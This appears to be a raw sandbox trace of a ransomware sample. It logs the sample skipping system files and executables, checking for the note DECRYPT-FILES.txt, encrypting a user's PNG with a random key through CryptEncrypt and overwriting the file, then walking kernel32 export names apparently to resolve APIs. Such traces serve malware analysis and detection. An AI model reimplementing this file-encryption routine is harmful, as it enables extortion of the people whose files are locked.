ftLastWriteTime.dwLowDateTime=0xadc22b20, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0083.163] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.163] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.163] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xadc22b20, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xadc22b20, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xadc48c80, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0083.163] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0083.163] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4ac0a270, ftCreationTime.dwHighDateTime=0x1d4d577, ftLastAccessTime.dwLowDateTime=0x5010cd60, ftLastAccessTime.dwHighDateTime=0x1d4cb8e, ftLastWriteTime.dwLowDateTime=0x5010cd60, ftLastWriteTime.dwHighDateTime=0x1d4cb8e, nFileSizeHigh=0x0, nFileSizeLow=0x2c1b, dwReserved0=0x0, dwReserved1=0x0, cFileName="hyQ_D.png", cAlternateFileName="")) returned 1 [0083.163] lstrcmpiW (lpString1="hyQ_D.png", lpString2="DECRYPT-FILES.txt") returned 1 [0083.163] lstrcmpiW (lpString1="hyQ_D.png", lpString2="autorun.inf") returned 1 [0083.163] lstrcmpiW (lpString1="hyQ_D.png", lpString2="boot.ini") returned 1 [0083.163] lstrcmpiW (lpString1="hyQ_D.png", lpString2="desktop.ini") returned 1 [0083.163] lstrcmpiW (lpString1="hyQ_D.png", lpString2="ntuser.dat") returned -1 [0083.163] lstrcmpiW (lpString1="hyQ_D.png", lpString2="iconcache.db") returned -1 [0083.163] lstrcmpiW (lpString1="hyQ_D.png", lpString2="bootsect.bak") returned 1 [0083.163] lstrcmpiW (lpString1="hyQ_D.png", lpString2="ntuser.dat.log") returned -1 [0083.163] lstrcmpiW (lpString1="hyQ_D.png", lpString2="thumbs.db") returned -1 [0083.163] lstrcmpiW (lpString1="hyQ_D.png", lpString2="Bootfont.bin") returned 1 [0083.163] lstrlenW (lpString="hyQ_D.png") returned 9 [0083.163] lstrcmpiW (lpString1="png", lpString2="lnk") returned 1 [0083.163] lstrcmpiW (lpString1="png", lpString2="exe") returned 1 [0083.163] lstrcmpiW (lpString1="png", lpString2="sys") returned -1 [0083.163] lstrcmpiW (lpString1="png", lpString2="dll") returned 1 [0083.163] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\") returned 64 [0083.164] lstrlenW (lpString="hyQ_D.png") returned 9 [0083.164] lstrcpyW (in: lpString1=0x3f2e428, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\" [0083.164] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\", lpString2="hyQ_D.png" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\hyQ_D.png") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\hyQ_D.png" [0083.164] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0083.164] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\hyQ_D.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ggflb 9aa\\szbevm7vdk3shvh\\hyq_d.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x448 [0083.164] GetFileSizeEx (in: hFile=0x448, lpFileSize=0x3f2dbf0 | out: lpFileSize=0x3f2dbf0*=11291) returned 1 [0083.164] CreateFileMappingW (hFile=0x448, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x44c [0083.164] MapViewOfFile (hFileMappingObject=0x44c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0083.164] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0083.164] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0083.164] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0083.165] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2db58*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2db58*=0x100) returned 1 [0083.165] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0083.165] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.165] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0083.166] CloseHandle (hObject=0x44c) returned 1 [0083.166] SetFilePointerEx (in: hFile=0x448, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.166] WriteFile (in: hFile=0x448, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2db78, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2db78*=0x108, lpOverlapped=0x0) returned 1 [0083.167] CloseHandle (hObject=0x0) returned 0 [0083.167] CloseHandle (hObject=0x448) returned 1 [0083.167] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.167] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.167] GetTickCount () returned 0x114d431 [0083.167] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0083.167] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0083.167] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0083.168] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0083.168] lstrlenA (lpString="kernel32.dll") returned 12 [0083.168] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0083.168] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0083.168] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0083.168] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0083.168] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0083.168] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0083.168] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0083.168] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0083.168] lstrlenA (lpString="ADDATOMA") returned 8 [0083.168] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0083.168] lstrlenA (lpString="ADDATOMW") returned 8 [0083.168] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0083.168] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0083.168] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0083.168] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0083.168] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0083.169] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0083.169] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0083.169] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0083.169] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0083.169] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0083.169] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0083.169] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0083.169] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0083.169] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0083.169] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0083.169] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0083.169] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0083.169] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0083.169] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0083.169] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0083.169] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0083.169] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0083.169] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0083.169] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0083.169] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0083.169] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0083.169] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0083.169] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0083.169] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0083.169] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0083.169] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0083.169] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0083.169] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0083.169] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0083.169] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0083.169] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0083.169] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0083.169] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0083.169] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0083.169] lstrlenA (lpString="BACKUPREAD") returned 10 [0083.169] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0083.169] lstrlenA (lpString="BACKUPSEEK") returned 10 [0083.170] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0083.170] lstrlenA (lpString="BACKUPWRITE") returned 11 [0083.170] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0083.170] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0083.170] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0083.170] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0083.170] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0083.170] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0083.170] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0083.170] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0083.170] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0083.170] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0083.170] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0083.170] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0083.170] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0083.170] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0083.170] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0083.170] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0083.170] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0083.170] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0083.170] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0083.170] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0083.170] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0083.170] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0083.170] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0083.170] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0083.170] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0083.170] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0083.170] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0083.170] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0083.170] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0083.170] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0083.170] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0083.170] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0083.170] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0083.170] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0083.170] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0083.171] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0083.171] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0083.171] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0083.171] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0083.171] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0083.171] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0083.171] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0083.171] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0083.171] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0083.171] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0083.171] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0083.171] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0083.171] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0083.171] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0083.171] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0083.171] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0083.171] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0083.171] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0083.171] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0083.171] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0083.171] lstrlenA (lpString="BEEP") returned 4 [0083.171] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0083.171] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0083.171] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0083.171] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0083.171] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0083.171] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0083.171] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0083.171] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0083.171] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0083.171] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0083.171] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0083.171] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0083.171] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0083.171] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0083.171] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0083.172] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0083.172] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0083.172] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0083.172] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0083.172] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0083.172] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0083.172] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0083.172] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0083.172] lstrlenA (lpString="CANCELIO") returned 8 [0083.172] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0083.172] lstrlenA (lpString="CANCELIOEX") returned 10 [0083.172] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0083.172] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0083.172] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0083.172] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0083.172] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0083.172] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0083.172] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0083.172] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0083.172] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0083.172] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0083.172] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0083.172] lstrlenA (lpString="CHECKELEVATION") returned 14 [0083.172] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0083.172] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0083.172] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0083.172] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0083.172] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0083.172] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0083.172] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0083.172] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0083.172] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0083.172] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0083.172] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0083.172] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0083.172] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0083.172] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0083.173] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0083.173] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0083.173] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0083.173] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0083.173] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0083.173] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0083.173] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0083.173] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0083.173] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0083.173] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0083.173] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0083.173] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0083.173] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0083.173] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 